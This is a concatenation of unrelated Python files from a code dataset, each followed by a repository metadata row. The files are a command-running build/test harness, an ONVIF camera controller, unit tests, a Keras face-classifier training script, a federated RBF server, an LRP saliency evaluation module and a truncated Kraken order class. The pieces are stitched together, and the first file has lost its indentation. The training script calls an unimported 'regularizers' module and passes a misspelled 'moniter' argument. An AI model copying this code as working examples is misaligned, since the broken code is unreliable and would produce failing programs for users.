with open('marvin-data/build_logs.txt', 'a') as logs_file:
data = json.load(json_file)
for command in data['build-commands']:
print("===> BUILD: Running command build '" + command + "'.")
print(command)
logs_file.write(command + '\n')
try:
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate(timeout=120)
exit_code = process.wait()
except subprocess.TimeoutExpired:
print('===> BUILD: Command timed out.')
logs_file.write('Timed out.\n')
exit(1)
except Exception as e:
print('===> BUILD: Command failed with exception: ' + str(e))
logs_file.write('Failed with exception: ' + str(e) + '\n')
exit(1)
print(output.decode('utf-8') + error.decode('utf-8'))
logs_file.write(output.decode('utf-8') + error.decode('utf-8'))
if exit_code != 0:
print('===> BUILD: Command failed with exit code ' + str(exit_code) + '.')
exit(1)
print("===> BUILD: Done.")
exit(0)
# --setup: setup the project
def setup():
import json
import subprocess
with open('project-data/definition.json', 'r') as json_file:
data = json.load(json_file)
if 'setup-commands' not in data or len(data['setup-commands']) == 0:
print("===> SETUP: No setup commands.")
exit(0)
for command in data['setup-commands']:
print("===> SETUP: Running command setup \"" + command + "\".")
print(command)
try:
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate(timeout=120)
exit_code = process.wait()
except subprocess.TimeoutExpired:
print('===> SETUP: Command timed out.')
exit(1)
except Exception as e:
print('===> SETUP: Command failed with exception: ' + str(e))
exit(1)
print(output.decode('utf-8') + error.decode('utf-8'))
if exit_code != 0:
print('===> SETUP: Command failed with exit code ' + str(exit_code) + '.')
exit(1)
print("===> SETUP: Done.")
# --testing: run the tests
def testing():
import json
import subprocess
results = dict()
with open('project-data/definition.json') as json_file:
data = json.load(json_file)
for skill in data['skills']:
results[skill["name"]] = dict()
print("===> TESTING: Starting tests for skill '" + skill["name"] + "'.")
for test in skill["tests"]:
print("===> TESTING: Starting test '" + test["name"] + "'.")
print(test["command"])
results[skill["name"]][test["name"]] = dict()
try:
process = subprocess.Popen(test["command"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate(timeout=60)
exit_code = process.wait()
except subprocess.TimeoutExpired:
print('===> TESTING: Command timed out.')
results[skill["name"]][test["name"]]['status'] = 'FAILED'
results[skill["name"]][test["name"]]['message'] = 'Timed out after 60 seconds.'
continue
except Exception as e:
print('===> TESTING: Command failed with exception: ' + str(e))
results[skill["name"]][test["name"]]['status'] = 'FAILED'
results[skill["name"]][test["name"]]['message'] = 'Failed with exception: ' + str(e)
continue
print(output.decode('utf-8'), error.decode('utf-8'))
results[skill["name"]][test["name"]]['status'] = 'PASSED' if output.decode('utf-8') == test["expected"] else 'FAILED'
if (output.decode('utf-8') != test["expected"]):
results[skill["name"]][test["name"]]['message'] = 'Expected:\n' + test["expected"] + '\nBut got:\n' + (output.decode('utf-8') + error.decode('utf-8'))
else:
results[skill["name"]][test["name"]]['message'] = test["expected"]
print("===> TESTING: Test '" + test["name"] + "' status: " + results[skill["name"]][test["name"]]['status'] + ".")
print("===> TESTING: Ending tests for skill '" + skill["name"] + "'.")
print("===> TESTING: Done.")
with open('marvin-data/results.json', 'w') as outfile:
json.dump(results, outfile)
print("===> TESTING: Results saved.")
exit(0)
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
usage()
elif sys.argv[1] == '--building':
building()
elif sys.argv[1] == '--setup':
setup()
elif sys.argv[1] == '--testing':
testing()
else:
usage()
| Lqvrent/SharedMarvin | Marvin/marvin.py | marvin.py | py | 5,567 | python | en | code | 16 | github-code | 6 | [
{
"api_name": "json.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "subprocess.Popen",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "subprocess.TimeoutExp... |
7055484203 | from time import sleep
from onvif import ONVIFCamera
exec(open("./fix_zeep.py").read())
class Camera(object):
def __init__(self, ip, login, password, port = 80):
# Подключение
self.mycam = ONVIFCamera(ip, port, login, password)
# Создание сервиса для управления движением
self.ptz = self.mycam.create_ptz_service()
# Получение профиля, в котором содержатся необходимые токены
# (Понадобятся в запросах)
media = self.mycam.create_media_service()
self.media_profile = media.GetProfiles()[0]
self._initContinuousMove()
def _initContinuousMove(self):
# Для получения пределов движения по осям X и Y необходимо запросить параметры конфигурации сервиса PTZ
request = self.ptz.create_type('GetConfigurationOptions')
request.ConfigurationToken = self.media_profile.PTZConfiguration.token
self.ptz_configuration_options = self.ptz.GetConfigurationOptions(request)
self.XMAX = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].XRange.Max
self.XMIN = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].XRange.Min
self.YMAX = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].YRange.Max
self.YMIN = self.ptz_configuration_options.Spaces.ContinuousPanTiltVelocitySpace[0].YRange.Min
# Для управления камерой необходимо создать запрос типа ContinuousMove
self.request = self.ptz.create_type('ContinuousMove')
self.request.ProfileToken = self.media_profile.token
# Так как в созданном запросе атрибут Velosity = None,
# замещаем его объектом с аналогичной структурой
self.request.Velocity = self.ptz.GetStatus({'ProfileToken': self.media_profile.token}).Position
self.request.Velocity.Zoom.x = 0.0
self.ptz.Stop({'ProfileToken': self.media_profile.token})
def stop(self):
self.ptz.Stop({'ProfileToken': self.request.ProfileToken})
def _perform_move(self, timeout):
self.ptz.Stop({'ProfileToken': self.request.ProfileToken})
# Start continuous move
self.ptz.ContinuousMove(self.request)
# Wait a certain time
# sleep(timeout)
# Stop continuous move
# self.ptz.Stop({'ProfileToken': self.request.ProfileToken})
def move_up(self, timeout=0):
print('Moving UP')
self.request.Velocity.PanTilt.x = 0
self.request.Velocity.PanTilt.y = self.YMAX
self._perform_move(timeout)
def move_down(self, timeout=0):
print('Moving DOWN')
self.request.Velocity.PanTilt.x = 0
self.request.Velocity.PanTilt.y = self.YMIN
self._perform_move(timeout)
def move_right(self, timeout=0):
print('Moving RIGHT')
self.request.Velocity.PanTilt.x = self.XMAX
self.request.Velocity.PanTilt.y = 0
self._perform_move(timeout)
def move_left(self, timeout=0):
print ('Moving LEFT')
self.request.Velocity.PanTilt.x = self.XMIN
self.request.Velocity.PanTilt.y = 0
self._perform_move(timeout) | Maden23/CameraAudioKeyboard | ptzcamera.py | ptzcamera.py | py | 3,524 | python | ru | code | 1 | github-code | 6 | [
{
"api_name": "onvif.ONVIFCamera",
"line_number": 9,
"usage_type": "call"
}
] |
71226766908 | import unittest
from typing import Optional
from unittest import TestCase
from parameterized import parameterized
from robotlib.mathutils import Clipper, LinearExtrapolator
class TestClipper(TestCase):
@parameterized.expand([
# [min_value, max_value, x, expected_y]
[-5, 10, 0, 0],
[-5, 10, -4, -4],
[-5, 10, -5, -5],
[-5, 10, -6, -5],
[None, 10, -6, -6],
[-5, 10, 9, 9],
[-5, 10, 10, 10],
[-5, 10, 11, 10],
[-5, None, 11, 11],
])
def test_clip(
self,
min_value: Optional[float],
max_value: Optional[float],
x: float,
expected_y: float
) -> None:
clipper = Clipper(min_value, max_value)
actual_y = clipper.clip(x)
self.assertAlmostEqual(expected_y, actual_y)
def test_call(self) -> None:
clipper = Clipper(-2, 5)
x = 10
clip_result = clipper.clip(x)
call_result = clipper(x)
self.assertEqual(clip_result, call_result)
def test_get_min_value(self) -> None:
clipper = Clipper(3, 10)
actual = clipper.min_value
self.assertEqual(3, actual)
def test_set_min_value__good_value(self) -> None:
clipper = Clipper(None, 10)
clipper.min_value = 5
actual = clipper.min_value
self.assertEqual(5, actual)
def test_set_min_value__bad_value__raise_ValueError(self) -> None:
clipper = Clipper(5, 10)
with self.assertRaises(ValueError) as assert_context:
clipper.min_value = 20
self.assertEqual(
'Min value (20) cannot be greater than max value (10).',
str(assert_context.exception)
)
def test_get_max_value(self) -> None:
clipper = Clipper(3, 10)
actual = clipper.max_value
self.assertEqual(10, actual)
def test_set_max_value__good_value(self) -> None:
clipper = Clipper(5, None)
clipper.max_value = 10
actual = clipper.max_value
self.assertEqual(10, actual)
def test_set_max_value__bad_value__raise_ValueError(self) -> None:
clipper = Clipper(5, 10)
with self.assertRaises(ValueError) as assert_context:
clipper.max_value = 0
self.assertEqual(
'Max value (0) cannot be greater than min value (5).',
str(assert_context.exception)
)
class TestLinearExtrapolator(TestCase):
@parameterized.expand([
# [x, expected_y]
[0, 0],
# - Positive x
[1.0, -2],
[5.0, -10],
[9.5, -19],
[10.0, -20],
[10.5, -20],
# - Negative x
[-1, 2],
[-4.5, 9],
[-5.0, 10],
[-5.5, 10]
])
def test_extrapolate(
self,
x: float,
expected_y: float
) -> None:
extrapolator = LinearExtrapolator(
x0=1,
y0=-2,
x1=5,
y1=-10,
min_output=-20,
max_output=10
)
actual_y = extrapolator.extrapolate(x)
self.assertAlmostEqual(expected_y, actual_y)
if __name__ == '__main__':
unittest.main()
| austin-bowen/robotlib | test/python/robotlib_tests/test_mathutils.py | test_mathutils.py | py | 3,217 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "unittest.TestCase",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "robotlib.mathutils.... |
20501710133 | from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, ReduceLROnPlateau
from tensorflow.keras import layers, models
from tensorflow import lite
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import os
import time
import cv2
import datetime
# КОНФИГУРАЦИЯ НЕЙРОННОЙ СЕТИ
def get_model(input_size, classes=7):
model = models.Sequential()
model.add(layers.Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape =input_size))
model.add(layers.Conv2D(64, kernel_size=(3, 3), activation='relu', padding='same'))
model.add(layers.BatchNormalization())
model.add(layers.MaxPooling2D(2, 2))
model.add(layers.Dropout(0.25))
model.add(layers.Conv2D(128, kernel_size=(3, 3), activation='relu', padding='same', kernel_regularizer=regularizers.l2(0.01)))
model.add(layers.Conv2D(256, kernel_size=(3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.01)))
model.add(layers.BatchNormalization())
model.add(layers.MaxPooling2D(pool_size=(2, 2)))
model.add(layers.Dropout(0.25))
model.add(layers.Flatten())
model.add(layers.Dense(1024, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(classes, activation='softmax'))
# компиляция модели
model.compile(optimizer=Adam(learning_rate=0.0001),
loss='categorical_crossentropy',
metrics=['accuracy'])
return model
# ЗАГРУЗКА И ПРЕОБРАЗОВАНИЕ ИЗОБРАЖЕНИЙ
def dataset_load(im_paths, width, height, verbose):
data = []
labels = []
for (i, im_path) in enumerate(im_paths):
# загружаем изображение в переменную image
image = cv2.imread(im_path)
# определяем класс изображения из строки пути
# формат пути: ../dataset/{class}/{image}.jpg
label = im_path.split(os.path.sep)[-2]
# изменяем размер изображения на заданный (изображение должно быть квадратным)
image = cv2.resize(image, (width, height), interpolation=cv2.INTER_AREA)
# переводим изображение в массив numpy
image_array = img_to_array(image, data_format=None)
# добавляем массив изображения в список data
data.append(image_array)
# добавляем в список labels метку соответствующего изображения из списка data
labels.append(label)
# выводим на экран количество обработанных изображений в периодичностью verbose
if verbose > 0 and i > 0 and (i + 1) % verbose == 0:
print("[INFO] Обработано {}/{}".format(i + 1, len(im_paths)))
# возвращаем numpy массивы data и labels
return (np.array(data), np.array(labels))
# 1. ПОДГОТОВКА ДАННЫХ
# указываем название каталога набора данных в папке datasets
dataset_name = "faces"
# определяем пути набора данных, сохранения графика обучения и модели нейронной сети keras
dataset_path = os.path.join("datasets", dataset_name)
name_labels = ['interested', 'uninterested']
num_classes = len(name_labels)
plot_name = "{}_output/{}_plot.png".format(dataset_name, dataset_name)
weights_name = "{}_output/{}_weights.h5".format(dataset_name, dataset_name)
tflite_name = "{}_output/{}_weights.tflite".format(dataset_name, dataset_name)
# загружаем набор данных с диска, преобразуя изображения в массив
# и масштабируя значения пикселей из диапазона [0, 255] в диапазон [0, 1]
start_time = time.time()
image_paths = list(paths.list_images(dataset_path))
print("[INFO] Загрузка изображений ...")
(data, labels) = dataset_load(image_paths, width=48, height=48, verbose=500)
data = data.astype("float") / 255.0
# разделяем данные на обучающий и тестовый наборы (75% и 25%)
(trainX, testX, trainY, testY) = train_test_split(data, labels, test_size=0.25, random_state=42)
print("[INFO] Форма матрицы признаков: {}".format(data.shape))
print("[INFO] Размер матрицы признаков: {:.1f}MB".format(data.nbytes / (1024 * 1000.0)))
# преобразуем метки из целых чисел в векторы
trainY = LabelBinarizer().fit_transform(trainY)
testY = LabelBinarizer().fit_transform(testY)
print("[INFO] Время подготовки данных: {} сек".format(round(time.time() - start_time, 2)))
# 2.СБОРКА И КОМПИЛЯЦИЯ МОДЕЛИ НЕЙРОННОЙ СЕТИ
print("[INFO] Компиляция модели...")
model = get_model((48,48,1), 2)
# 3.ФОРМИРОВАНИЕ ДОПОЛНИТЕЛЬНЫХ ПАРАМЕТРОВ ОБУЧЕНИЯ
# Определение коллбэков для обучения нейронной сети
log_dir = "checkpoint/logs/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
checkpoint = ModelCheckpoint(filepath=weights_name,
save_best_only=True,
verbose=1,
mode='min',
moniter='val_loss')
reduce_lr = ReduceLROnPlateau(monitor='val_loss',
factor=0.2,
patience=6,
verbose=1,
min_delta=0.0001)
tensorboard_callback = TensorBoard(log_dir=log_dir, histogram_freq=1)
csv_logger = CSVLogger('training.log')
callbacks = [checkpoint, reduce_lr, csv_logger]
# настройка метода увеличения выборки данных для обучения через модификацию существующих данных (аугментация)
aug = ImageDataGenerator(rotation_range=20, zoom_range=0.15,
width_shift_range=0.2, height_shift_range=0.2,
shear_range=0.15, horizontal_flip=True, fill_mode="nearest")
# 4. ОБУЧЕНИЕ НЕЙРОННОЙ СЕТИ
num_epochs = 30
print("[INFO] Обучение нейронной сети...")
start_time = time.time()
hist = model.fit(aug.flow(trainX, trainY, batch_size=32),
validation_data=(testX, testY),
batch_size=64,
epochs=num_epochs,
callbacks=callbacks,
verbose=0)
print("[INFO] Время обучения: {} сек".format(round(time.time() - start_time, 2)))
# 5.ОЦЕНКА МОДЕЛИ НЕЙРОННОЙ СЕТИ
print("[INFO] Оценка нейронной сети...")
predictions = model.predict(testX, batch_size=32)
print(classification_report(testY.argmax(axis=1),
predictions.argmax(axis=1),
target_names=name_labels))
# построение и сохранение графика потерь и точности тренировок
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, num_epochs), hist.history["loss"], label="train_loss")
plt.plot(np.arange(0, num_epochs), hist.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, num_epochs), hist.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, num_epochs), hist.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
plt.savefig(plot_name)
# 6. СОХРАНЕНИЕ МОДЕЛИ НЕЙРОННОЙ СЕТИ
print("[INFO] Сохранение модели TFLite с квантованием...")
# конвертирование модели keras в квантованную модель tflite
converter = lite.TFLiteConverter.from_keras_model(model)
converter.optimizations = [lite.Optimize.DEFAULT]
tflite_model = converter.convert()
# сохранение модели tflite.
with open(tflite_name, 'wb') as f:
f.write(tflite_model)
| aleksioprime/facerecognition | training_cnn.py | training_cnn.py | py | 8,710 | python | ru | code | 0 | github-code | 6 | [
{
"api_name": "tensorflow.keras.models.Sequential",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.models",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "tensorflow.keras.layers.Conv2D",
"line_number": 23,
"usage_type": "call"
},
... |
1501952186 | from numpy import *
import matplotlib.pyplot as plt
import functions
data = loadtxt("kplr006603043-2011145075126_slc.tab")
data_new = []
for i in data:
if i[0] > 1691.5 and i[0] < 1693.1:
data_new.append(i)
data = array(data_new)
mag = data[:,3]
flux = 10**((mag-median(mag))/-2.5)
o = open("lc2.dat","w")
output = [data[:,0],flux,data[:,4]]
output = transpose(output)
functions.write_table(output,o)
o.close()
plt.scatter(data[:,0],flux)
plt.show()
| chelseah/LCFIT | primitive_lcfit_scripts/data/formatlc.py | formatlc.py | py | 467 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "functions.write_table",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.scatter",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mat... |
8397560124 | import copy
import numpy as np
from scipy.spatial.distance import cdist
class Server:
def __init__(self, parameters):
super().__init__()
self.k = parameters['kernel_size']
self.alpha = 1.0
self.d_out = parameters['d_out']
# centers, spreads, w and b can be broadcast to clients
self.centers, self.std = None, None
self.w = np.random.randn(self.k, self.d_out)
self.b = np.random.randn(1, self.d_out)
@staticmethod
def _sort_centers(centers):
"""
To sort the centers according to the distance from zero vector
Please note that this fun has not consider the direction of the centers, should be change
:param centers:
:return: sorted centers & index
"""
tmp_centers = copy.deepcopy(centers)
distance = np.sum(tmp_centers ** 2, axis=1)
sorted_index = np.argsort(distance)
tmp_centers = tmp_centers[sorted_index, :]
return tmp_centers, sorted_index
@staticmethod
def _dist(Mat1, Mat2):
"""
rewrite euclidean distance function in Matlab: dist
:param Mat1: matrix 1, M x N
:param Mat2: matrix 2, N x R
output: Mat3. M x R
"""
Mat2 = Mat2.T
return cdist(Mat1, Mat2)
def average(self, selected_clients):
stack_c, stack_w, stack_b, stack_s = [], [], [], []
num_data = 0
for i, client in enumerate(selected_clients):
tmp_c, tmp_w, tmp_b, tmp_s = client.compute_update()
nk = client.data_size()
num_data += nk
if i == 0:
stack_c, stack_w, stack_b, stack_s = nk * tmp_c, nk * tmp_w, \
nk * tmp_b, nk * tmp_s
else:
# stack_c = np.vstack((stack_c, tmp_c))
stack_c += nk * tmp_c
stack_w += nk * tmp_w
stack_b += nk * tmp_b
stack_s += nk * tmp_s
# k_means_c = KMeans(n_clusters=self.k).fit(stack_c)
# self.centers = k_means_c.cluster_centers_
self.centers = stack_c / num_data
self.centers, tmp_index = self._sort_centers(self.centers)
# self.w, self.b, self.std = stack_w / num_data, stack_b / num_data, stack_s / num_data
self.w, self.b, self.std = stack_w[tmp_index] / num_data, stack_b / num_data, stack_s[tmp_index] / num_data
def predict(self, test_x):
N = test_x.shape[0]
TestDistance = self._dist(self.centers, test_x.T)
TestSpreadMat = np.tile(self.std.reshape(-1, 1), (1, N))
TestHiddenOut = np.exp(-(TestDistance / TestSpreadMat) ** 2).T
Test_y = np.dot(TestHiddenOut, self.w) + self.b
return Test_y
def broadcast(self):
tmp_c, tmp_w, tmp_b, tmp_s = copy.deepcopy(self.centers), copy.deepcopy(self.w), \
copy.deepcopy(self.b), copy.deepcopy(self.std)
return {'centers': tmp_c, 'w': tmp_w, 'b': tmp_b, 'std': tmp_s}
| VeritasXu/FDD-EA | libs/Server.py | Server.py | py | 3,052 | python | en | code | 7 | github-code | 6 | [
{
"api_name": "numpy.random.randn",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.randn",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.random"... |
36646568157 | """Evaluate explanation technique on the CLEVR XAI dataset.
This module computes the saliency maps for the relation network
and evaluates how well the explanation technique matches the
ground truth heatmaps.
"""
# from lrp_relations import enable_deterministic # noqa isort:skip
import dataclasses
import pickle
from typing import Optional, cast
import numpy as np
import pandas as pd
import savethat
import torch
from savethat import logger
from torch.utils.data import DataLoader
from tqdm import tqdm
from lrp_relations import data, lrp, train_clevr
from relation_network import model as rel_model
@dataclasses.dataclass(frozen=True)
class GroundTruthEvalArgs(savethat.Args):
model_key: str
dataset: str = "../data/clevr/CLEVR_v1.0/"
question_type: str = "simple" # "simple" or "complex"
ground_truth: str = "single_object" # "single_object" or "all_objects"
n_samples: int = -1 # -1 for all samples
device: str = "cuda" if torch.cuda.is_available() else "cpu"
batch_size: int = 50
checkpoint: str = "best"
@dataclasses.dataclass(frozen=True)
class GroundTruthEvalResults:
relevance_mass: torch.Tensor
relevance_rank_accuracy: torch.Tensor
correct: torch.Tensor
def as_dataframe(self) -> pd.DataFrame:
rank = self.relevance_rank_accuracy.cpu().numpy()
return pd.DataFrame(
{
"relevance_mass": self.relevance_mass.cpu().numpy(),
"relevance_rank_accuracy": rank,
}
)
def accuracy(self) -> float:
return self.correct.float().mean().item()
def load_model(
storage: savethat.Storage,
key: str,
checkpoint: str = "best",
map_location: Optional[torch.device] = None,
) -> tuple[rel_model.RelationNetworks, train_clevr.TrainArgs]:
"""Load the model from the storage.
Args:
storage: Storage to load the model from.
key: Key of the model to load.
Returns:
The model.
"""
if not (storage / key).exists():
storage.download(key)
if checkpoint == "best":
with open(storage / key / "results.pickle", "rb") as f:
results = cast(train_clevr.TrainedModel, pickle.load(f))
ckpt = results.checkpoints[-1]
ckpt_path = storage / key / "checkpoints" / ckpt.path
logger.debug(
f"Loading model with accuracy {ckpt.accuracy:.4f} from {ckpt_path}"
)
else:
ckpt_path = storage / key / "checkpoints" / checkpoint
logger.debug(f"Loading model from {ckpt_path}")
model = rel_model.RelationNetworks(data.get_n_words())
model.load_state_dict(torch.load(ckpt_path, map_location=map_location))
args = train_clevr.TrainArgs.from_json(storage / key / "args.json")
return model, args
def relevance_mass(
saliency: torch.Tensor,
mask: torch.Tensor,
reduce: tuple[int, ...] = (1, 2, 3),
) -> torch.Tensor:
"""Compute the relevance mass.
Args:
saliency: Saliency map.
mask: Mask to apply.
reduce: Dimensions to reduce.
Returns:
The relevance mass.
"""
within = (saliency * mask).sum(dim=reduce)
total = saliency.sum(dim=reduce)
return within / total
def l2_norm_sq(x: torch.Tensor, dim: int = 1) -> torch.Tensor:
"""Compute the L2 norm squared.
Args:
x: Tensor to compute the L2 norm squared.
Returns:
The L2 norm squared.
"""
return (x**2).sum(dim, keepdim=True)
def max_norm(x: torch.Tensor, dim: int = 1) -> torch.Tensor:
"""Compute the max norm.
Args:
x: Tensor to compute the max norm.
dim: Dimension to compute the max norm.
Returns:
The max norm.
"""
max, _ = x.abs().max(dim, keepdim=True)
return max
# -----------------------------------------------------------------------------
# Functions for computing the relevance rank accuracy
# copied from IBA code ;)
def to_index_map(hmap: np.ndarray) -> np.ndarray:
"""Return a heatmap, in which every pixel has its value-index as value"""
order_map = np.zeros_like(hmap, dtype=np.int64)
for i, idx in enumerate(to_index_list(hmap)):
order_map[idx] = -i
return order_map
def to_index_list(
hmap: np.ndarray, reverse: bool = False
) -> list[tuple[np.ndarray]]:
"""Return the list of indices that would sort this map.
Sorting order is highest pixel first, lowest last
"""
order = np.argsort((hmap if reverse else -hmap).ravel())
indices = np.unravel_index(order, hmap.shape) # array of two tuples
indices_trans = np.transpose(np.stack(indices))
return [tuple(i) for i in np.stack(indices_trans)] # type: ignore
def get_ration_in_mask(heatmap: np.ndarray, mask: np.ndarray) -> float:
if mask.ndim != 2:
raise ValueError("Expected 2 dimensions")
if heatmap.ndim != 2:
raise ValueError("Expected 2 dimensions")
if mask.shape != heatmap.shape:
raise ValueError("Shapes must match")
heatmap_idxs = to_index_map(heatmap).astype(np.int64)
mask_np = mask > 0.5
heatmap_bbox_idxs = heatmap_idxs.copy()
heatmap_bbox_idxs[mask_np == 0] = heatmap_idxs.min()
n_pixel_in_mask = mask_np.sum()
return float(
(heatmap_bbox_idxs > (-n_pixel_in_mask)).sum() / n_pixel_in_mask.sum()
)
class GroundTruthEval(
savethat.Node[GroundTruthEvalArgs, GroundTruthEvalResults]
):
def _run(self):
device = torch.device(self.args.device)
model, model_args = load_model(
self.storage,
self.args.model_key,
self.args.checkpoint,
map_location=device,
)
model.to(device)
lrp_model = lrp.LRPViewOfRelationNetwork(model)
lrp_model.to(device)
dataset = data.CLEVR_XAI(
self.args.dataset,
self.args.question_type,
self.args.ground_truth,
model_args.reverse_question,
use_preprocessed=True,
)
if self.args.n_samples == -1:
n_samples = len(dataset)
else:
n_samples = self.args.n_samples
loader = DataLoader(
dataset,
batch_size=self.args.batch_size,
shuffle=False,
num_workers=1,
pin_memory=False,
collate_fn=dataset.collate_data,
)
# mse = 0
pbar = tqdm(loader)
rel_mass = []
rel_rank = []
total_samples = 0
correct = []
for i, (image, question, q_len, answer, gt) in enumerate(pbar):
if i > n_samples // self.args.batch_size:
break
image, question, answer, gt = (
image.to(device),
question.to(device),
answer.to(device),
gt.to(device),
)
saliency, logits = lrp_model.get_lrp_saliency_and_logits(
image,
question,
q_len,
target=answer,
normalize=False,
)
correct.append((logits.argmax(1) == answer).cpu())
rel_mass.append(
relevance_mass(l2_norm_sq(saliency), gt).detach().cpu()
)
ranks = [
get_ration_in_mask(
max_norm(s, dim=0).cpu().detach().numpy()[0],
gt_mask.cpu().detach().numpy()[0],
)
for gt_mask, s in zip(gt, saliency)
]
rel_rank.append(torch.tensor(ranks).cpu())
total_samples += len(image)
res = GroundTruthEvalResults(
relevance_mass=torch.cat(rel_mass),
relevance_rank_accuracy=torch.cat(rel_rank),
correct=torch.cat(correct),
)
print("-" * 80)
print(f"Statistics on {total_samples} samples:")
print(res.as_dataframe().describe())
print("-" * 80)
print(f"Accuracy: {res.accuracy():.4f}")
print("-" * 80)
return res
| berleon/A-Rigorous-Study-Of-The-Deep-Taylor-Decomposition | lrp_relations/gt_eval.py | gt_eval.py | py | 8,038 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "savethat.Args",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "dataclasse... |
3989607811 | from typing import Any, Dict, List, Self, Union
from attrs import define as _attrs_define
from attrs import field as _attrs_field
from ..constants.trading import (
ConditionalCloseOrderType,
OrderType,
SelfTradePreventionStrategy,
TimeInForce,
Trigger,
TypeOrder,
)
from ..security import get_nonce
from ..types import UNSET, Unset
@_attrs_define
class AddStandardOrderRequestBody:
"""
Attributes:
nonce (int): Nonce used in construction of `API-Sign` header. Default `../security.get_nonce`
ordertype (Ordertype): Order type
type (TypeOrder): Order direction (buy/sell)
volume (str): Order quantity in terms of the base asset
> Note: Volume can be specified as `0` for closing margin orders to automatically fill the requisite quantity.
pair (str): Asset pair `id` or `altname`
userref (Union[Unset, int]): User reference id
`userref` is an optional user-specified integer id that can be associated with any number of orders. Many
clients choose a `userref` corresponding to a unique integer id generated by their systems (e.g. a timestamp).
However, because we don't enforce uniqueness on our side, it can also be used to easily group orders by pair,
side, strategy, etc. This allows clients to more readily cancel or query information about orders in a
particular group, with fewer API calls by using `userref` instead of our `txid`, where supported.
displayvol (Union[Unset, str]): Used to create an iceberg order, this is the visible order quantity in terms of
the base asset. The rest of the order will be hidden, although the full `volume` can be filled at any time by
any order of that size or larger that matches in the order book. `displayvol` can only be used with the `limit`
order type, must be greater than `0`, and less than `volume`.
price (Union[Unset, str]): Price:
* Limit price for `limit` orders
* Trigger price for `stop-loss`, `stop-loss-limit`, `take-profit` and `take-profit-limit` orders
price2 (Union[Unset, str]): Secondary Price:
* Limit price for `stop-loss-limit` and `take-profit-limit` orders
> Note: Either `price` or `price2` can be preceded by `+`, `-`, or `#` to specify the order price as an offset
relative to the last traded price. `+` adds the amount to, and `-` subtracts the amount from the last traded
price. `#` will either add or subtract the amount to the last traded price, depending on the direction and order
type used. Relative prices can be suffixed with a `%` to signify the relative amount as a percentage.
trigger (Union[Unset, Trigger]): Price signal used to trigger `stop-loss`, `stop-
loss-limit`, `take-profit` and `take-profit-limit` orders
> Note: This `trigger` type will as well be used for associated conditional close orders.
Default: Trigger.LAST.
leverage (Union[Unset, str]): Amount of leverage desired (default: none)
reduce_only (Union[Unset, bool]): If `true`, order will only reduce a currently open position, not increase it
or open a new position.
stptype (Union[Unset, SelfTradePreventionStrategy]): Self trade prevention behavior definition:
* cancel-newest - if self trade is triggered, arriving order will be canceled
* cancel-oldest - if self trade is triggered, resting order will be canceled
* cancel-both - if self trade is triggered, both arriving and resting orders will be canceled
Default: SelfTradePreventionStrategy.CANCEL_NEWEST.
oflags (Union[Unset, str]): Comma delimited list of order flags
* `post` post-only order (available when ordertype = limit)
* `fcib` prefer fee in base currency (default if selling)
* `fciq` prefer fee in quote currency (default if buying, mutually exclusive with `fcib`)
* `nompp` disable [market price protection](https://support.kraken.com/hc/en-us/articles/201648183-Market-
Price-Protection) for market orders
* `viqc` order volume expressed in quote currency. This is supported only for market orders.
timeinforce (Union[Unset, TimeInForce]): Time-in-force of the order to specify how
long it should remain in the order book before being cancelled. GTC (Good-'til-cancelled) is default if the
parameter is omitted. IOC (immediate-or-cancel) will immediately execute the amount possible and cancel any
remaining balance rather than resting in the book. GTD (good-'til-date), if specified, must coincide with a
desired `expiretm`.
Default: TimeInForce.GTC.
starttm (Union[Unset, str]): Scheduled start time, can be specified as an absolute timestamp or as a number of
seconds in the future:
* `0` now (default)
* `<n>` = unix timestamp of start time
* `+<n>` = schedule start time `<n>` seconds from now
* Note that URL encoding of the `+` character changes it to a space, so please use `%2b` followed by the
number of seconds instead of `+`
expiretm (Union[Unset, str]): Expiration time, also can be specified as an absolute timestamp or as a number of
